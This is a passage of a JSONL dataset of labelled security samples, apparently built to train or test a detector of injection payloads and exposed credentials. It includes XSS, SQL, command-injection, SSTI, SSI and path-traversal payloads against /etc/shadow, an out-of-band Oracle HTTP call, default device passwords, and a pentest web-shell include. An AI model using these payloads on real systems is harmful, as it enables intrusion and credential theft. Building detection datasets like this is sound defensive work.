"XSS"}}]} {"id": "seclists_01126", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=$NULL HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "$NULL", "injection_type": "cmd"}}]} {"id": "seclists_01127", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><legend onblur=alert(1) tabindex=1 id=x></legend><input autofocus></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<legend onblur=alert(1) tabindex=1 id=x></legend><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_01128", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"content_length\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"content_length\" -->", "injection_type": "SSI"}}]} {"id": "seclists_01129", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:mario1", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "mario1"}}]} {"id": "seclists_01130", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"IFRAME\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "IFRAME", "injection_type": "XSS"}}]} {"id": "seclists_01131", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><xmp onkeyup=\"alert(1)\" contenteditable>test</xmp></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<xmp onkeyup=\"alert(1)\" contenteditable>test</xmp>", "injection_type": "XSS"}}]} {"id": "seclists_01132", "source": "seclists", "source_license": "MIT", "text": "filename=;system('id')", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";system('id')", "injection_type": "cmd"}}]} {"id": "seclists_01133", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: ha.ckers.org</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_01134", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: general, evil tags, obfuscated, injection\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated, injection", "injection_type": "XSS"}}]} {"id": "seclists_01135", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%3C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3C", "injection_type": "cmd"}}]} {"id": "seclists_01136", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf 1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1", "injection_type": "cmd"}}]} {"id": "seclists_01137", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&#x000003c; HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x000003c;", "injection_type": "cmd"}}]} {"id": "seclists_01138", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:AMI,<N/A>,AMI,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "AMI,<N/A>,AMI,"}}]} {"id": "seclists_01139", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or a = a';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or a = a", "injection_type": "SQL"}}]} {"id": "seclists_01140", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit String: <a%20href=\"javascript:alert(1);</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <a%20href=\"javascript:alert(1);", "injection_type": "XSS"}}]} {"id": "seclists_01141", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello .version</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": ".version", "injection_type": "SSTI"}}]} {"id": "seclists_01142", "source": "seclists", "source_license": "MIT", "text": "filename=%5C/", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%5C/", "injection_type": "cmd"}}]} {"id": "seclists_01143", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: general, evil tags, obfuscated, internet explorer</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated, internet explorer", "injection_type": "XSS"}}]} {"id": "seclists_01144", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf '%7C%7Cecho$IFSONXHJN$((84%2B16))$(echo$IFSONXHJN)ONXHJN", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%7C%7Cecho$IFSONXHJN$((84%2B16))$(echo$IFSONXHJN)ONXHJN", "injection_type": "cmd"}}]} {"id": "seclists_01145", "source": "seclists", "source_license": "MIT", "text": "filename=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VDSMTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VDSMTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527", "injection_type": "cmd"}}]} {"id": "seclists_01146", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><figcaption onmousedown=\"alert(1)\">test</figcaption></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<figcaption onmousedown=\"alert(1)\">test</figcaption>", "injection_type": "XSS"}}]} {"id": "seclists_01147", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Tags: general, evil tags, style injection, internet explorer</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, style injection, internet explorer", "injection_type": "XSS"}}]} {"id": "seclists_01148", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:esther", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "esther"}}]} {"id": "seclists_01149", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Name: Evade Regex Filter 4\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Evade Regex Filter 4", "injection_type": "XSS"}}]} {"id": "seclists_01150", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'like';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "like", "injection_type": "SQL"}}]} {"id": "seclists_01151", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Author Name: ha.ckers.org\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_01152", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><slot draggable=\"true\" ondragstart=\"alert(1)\">test</slot></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<slot draggable=\"true\" ondragstart=\"alert(1)\">test</slot>", "injection_type": "XSS"}}]} {"id": "seclists_01153", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFTNKA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFTNKA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23", "injection_type": "cmd"}}]} {"id": "seclists_01154", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:hhhhhhhh", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "hhhhhhhh"}}]} {"id": "seclists_01155", "source": "seclists", "source_license": "MIT", "text": "# LDAP query log\nsearchFilter: !", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "!", "injection_type": "LDAP"}}]} {"id": "seclists_01156", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Remote Stylesheet 3\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Remote Stylesheet 3", "injection_type": "XSS"}}]} {"id": "seclists_01157", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %7C%20%5B%206%20-ne%20%24%28echo%20TEUISW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%206%20-ne%20%24%28echo%20TEUISW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C", "injection_type": "cmd"}}]} {"id": "seclists_01158", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=alpina\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "alpina"}}]} {"id": "seclists_01159", "source": "seclists", "source_license": "MIT", "text": "username=declare @q nvarchar (200) select @q = 0x770061 ...&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "declare @q nvarchar (200) select @q = 0x770061 ...", "injection_type": "SQL"}}]} {"id": "seclists_01160", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Alcatel,diag,switch,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Alcatel,diag,switch,"}}]} {"id": "seclists_01161", "source": "seclists", "source_license": "MIT", "text": "filename=/../../../../../../../../../../etc/passwd", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/../../../../../../../../../../etc/passwd", "injection_type": "cmd"}}]} {"id": "seclists_01162", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:crave", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "crave"}}]} {"id": "seclists_01163", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Tags: general, JS breaking</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, JS breaking", "injection_type": "XSS"}}]} {"id": "seclists_01164", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7Cecho%20CDHGHW$((46%2B6))$(echo%20CDHGHW)CDHGHW\" HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7Cecho%20CDHGHW$((46%2B6))$(echo%20CDHGHW)CDHGHW\"", "injection_type": "cmd"}}]} {"id": "seclists_01165", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Black Widow Web Design Ltd,admin,nimda,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Black Widow Web Design Ltd,admin,nimda,"}}]} {"id": "seclists_01166", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Name: Basic JS breaker variant 3</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Basic JS breaker variant 3", "injection_type": "XSS"}}]} {"id": "seclists_01167", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<strike onclick=\"alert(1)\">test</strike>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<strike onclick=\"alert(1)\">test</strike>", "injection_type": "XSS"}}]} {"id": "seclists_01168", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%27%0aecho$IFSNOGTKT$((72%2B41))$(echo$IFSNOGTKT)NOGTKT%5C%5C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%0aecho$IFSNOGTKT$((72%2B41))$(echo$IFSNOGTKT)NOGTKT%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_01169", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=*(|(mail=*)) HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "*(|(mail=*))", "injection_type": "cmd"}}]} {"id": "seclists_01170", "source": "seclists", "source_license": "MIT", "text": "username=admin\") or \"1\"=\"1\"/*&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\") or \"1\"=\"1\"/*", "injection_type": "SQL"}}]} {"id": "seclists_01171", "source": "seclists", "source_license": "MIT", "text": "password: Dynalink,admin,admin,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Dynalink,admin,admin,"}}]} {"id": "seclists_01172", "source": "seclists", "source_license": "MIT", "text": "filename=&#x00003c", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x00003c", "injection_type": "cmd"}}]} {"id": "seclists_01173", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: =;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "=;", "injection_type": "cmd"}}]} {"id": "seclists_01174", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: res://c:\\\\program%20files\\\\adobe\\\\acrobat%207.0\\\\acrobat\\\\acrobat.dll/#2/#210</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: res://c:\\\\program%20files\\\\adobe\\\\acrobat%207.0\\\\acrobat\\\\acrobat.dll/#2/#210", "injection_type": "XSS"}}]} {"id": "seclists_01175", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Author Name: ha.ckers.org</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_01176", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Advanced XSS Locator</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Advanced XSS Locator", "injection_type": "XSS"}}]} {"id": "seclists_01177", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello <%=42*42 %></h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "<%=42*42 %>", "injection_type": "SSTI"}}]} {"id": "seclists_01178", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Greatspeed,admin,broadband,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Greatspeed,admin,broadband,"}}]} {"id": "seclists_01179", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\n1, $where: '1 == 1'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1, $where: '1 == 1'", "injection_type": "NoSQL"}}]} {"id": "seclists_01180", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=admin') or ('1'='1'/* HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin') or ('1'='1'/*", "injection_type": "SQL"}}]} {"id": "seclists_01181", "source": "seclists", "source_license": "MIT", "text": "filename=1||Utl_Http.request('http://<yourservername>') from dual--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1||Utl_Http.request('http://<yourservername>') from dual--", "injection_type": "cmd"}}]} {"id": "seclists_01182", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Name: Self-contained XSS variant 7\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Self-contained XSS variant 7", "injection_type": "XSS"}}]} {"id": "seclists_01183", "source": "seclists", "source_license": "MIT", "text": "GET /profile?name=${donotexists|42*42} HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "${donotexists|42*42}", "injection_type": "SSTI"}}]} {"id": "seclists_01184", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=mail\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "mail"}}]} {"id": "seclists_01185", "source": "seclists", "source_license": "MIT", "text": "GET /profile?name=_context HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "_context", "injection_type": "SSTI"}}]} {"id": "seclists_01186", "source": "seclists", "source_license": "MIT", "text": "<?php\n\nreturn null;", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "VtigerVulnPlugin.php"}}]} {"id": "seclists_01187", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<rb onblur=alert(1) tabindex=1 id=x></rb><input autofocus> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<rb onblur=alert(1) tabindex=1 id=x></rb><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_01188", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '' or 0=0 --';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or 0=0 --", "injection_type": "SQL"}}]} {"id": "seclists_01189", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '\" or isNULL(1/0) /*';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" or isNULL(1/0) /*", "injection_type": "SQL"}}]} {"id": "seclists_01190", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=')print(`echo%20BWPFXW%0aecho%20$((76%2B34))%0aecho%20BWPFXW%0aecho%20BWPFXW`)%3BBWPFXW HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "')print(`echo%20BWPFXW%0aecho%20$((76%2B34))%0aecho%20BWPFXW%0aecho%20BWPFXW`)%3BBWPFXW", "injection_type": "cmd"}}]} {"id": "seclists_01191", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#exec cmd=\"dir\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#exec cmd=\"dir\" -->", "injection_type": "SSI"}}]} {"id": "seclists_01192", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/shadow HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ".\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/shadow", "injection_type": "cmd"}}]} {"id": "seclists_01193", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Digital Equipment,FIELD,DIGITAL,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Digital Equipment,FIELD,DIGITAL,"}}]} {"id": "seclists_01194", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>", "injection_type": "XSS"}}]} {"id": "seclists_01195", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = \") or sleep(__TIME__)=\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\") or sleep(__TIME__)=\"", "injection_type": "SQL"}}]} {"id": "seclists_01196", "source": "seclists", "source_license": "MIT", "text": "password: GlobespanVirata,root,root,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "GlobespanVirata,root,root,"}}]} {"id": "seclists_01197", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: update", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "update", "injection_type": "cmd"}}]} {"id": "seclists_01198", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%22%7C%20%5B%206%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%7C%20%5B%206%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C", "injection_type": "cmd"}}]} {"id": "seclists_01199", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=readers\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "readers"}}]} {"id": "seclists_01200", "source": "seclists", "source_license": "MIT", "text": "GET /api/user?filter=%21 HTTP/1.1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%21", "injection_type": "LDAP"}}]} {"id": "seclists_01201", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: =--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "=--", "injection_type": "cmd"}}]} {"id": "seclists_01202", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \\n/usr/bin/id\\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\n/usr/bin/id\\n", "injection_type": "cmd"}}]} {"id": "seclists_01203", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: a;/usr/bin/id;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a;/usr/bin/id;", "injection_type": "cmd"}}]} {"id": "seclists_01204", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: Conditional style injection for IE HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Conditional style injection for IE", "injection_type": "XSS"}}]} {"id": "seclists_01205", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: *(|(objectclass=*))", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "*(|(objectclass=*))", "injection_type": "cmd"}}]} {"id": "seclists_01206", "source": "seclists", "source_license": "MIT", "text": "username=select&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "select", "injection_type": "SQL"}}]} {"id": "seclists_01207", "source": "seclists", "source_license": "MIT", "text": "<?php\n/* *****************************************************************************\n***\n*** Laudanum Project\n*** A Collection of Injectable Files used during a Penetration Test\n***\n*** More information is available at:\n*** http://laudanum.secureideas.net\n*** laudanum@secureideas.net\n***\n*** Project Leads:\n*** Kevin Johnson <kjohnson@secureideas.net\n*** Tim Medin <tim@counterhack.com>\n***\n*** Copyright 2014 by Kevin Johnson and the Laudanum Team\n***\n********************************************************************************\n***\n*** This file provides a rudamentary IP filter to help prevent usage of Laudanum tools\n*** by someone other than the person who uploaded Laudanum. This file should be included\n*** in other Laudanum tools and not called directly. \n*** Written by Jason Gillam <jgillam@secureideas.com>\n***\n********************************************************************************\n*** This program is free software; you can redistribute it and/or\n*** modify it under the terms of the GNU General Public License\n*** as published by the Free Software Foundation; either version 2\n*** of the License, or (at your option) any later version.\n***\n*** This program is distributed in the hope that it will be useful,\n*** but WITHOUT ANY WARRANTY; without even the implied warranty of\n*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n*** GNU General Public License for more details.\n***\n*** You can get a copy of the GNU General Public License from this\n*** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n*** You can also write to the Free Software Foundation, Inc., 59 Temple\n*** Place - Suite 330, Boston, MA 02111-1307, USA.\n***\n***************************************************************************** */\n\n\n// ***************** Config entries below ***********************\n// IPs are enterable as individual addresses TODO: add CIDR support\n$wpl_allowedIPs = array(\"192.168.0.2\", \"127.0.0.1\", \"172.16.179.1\");\n \t\n\n# *********** No editable content below this line **************\n\n$wpl_allowed = 0;\nforeach ($wpl_allowedIPs as $IP) {\n if ($_SERVER[\"REMOTE_ADDR\"] == $IP)\n $wpl_allowed = 1;\n}\n\nif ($wpl_allowed == 0) {\n header(\"HTTP/1.0 404 Not Found\");\n die();\n}\n\n?>", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "ipcheck.php"}}]} {"id": "seclists_01208", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Sparklan,admin,admin,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Sparklan,admin,admin,"}}]} {"id": "seclists_01209", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %7C%7Cecho%20SBQJMU$((91%2B44))$(echo%20SBQJMU)SBQJMU//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%7Cecho%20SBQJMU$((91%2B44))$(echo%20SBQJMU)SBQJMU//", "injection_type": "cmd"}}]} {"id": "seclists_01210", "source": "seclists", "source_license": "MIT", "text": "filename=&#0000060;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#0000060;", "injection_type": "cmd"}}]} {"id": "seclists_01211", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<script src=\"//brutelogic.com.br&sol;1.js&num;\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<script src=\"//brutelogic.com.br&sol;1.js&num;", "injection_type": "XSS"}}]} {"id": "seclists_01212", "source": "seclists", "source_license": 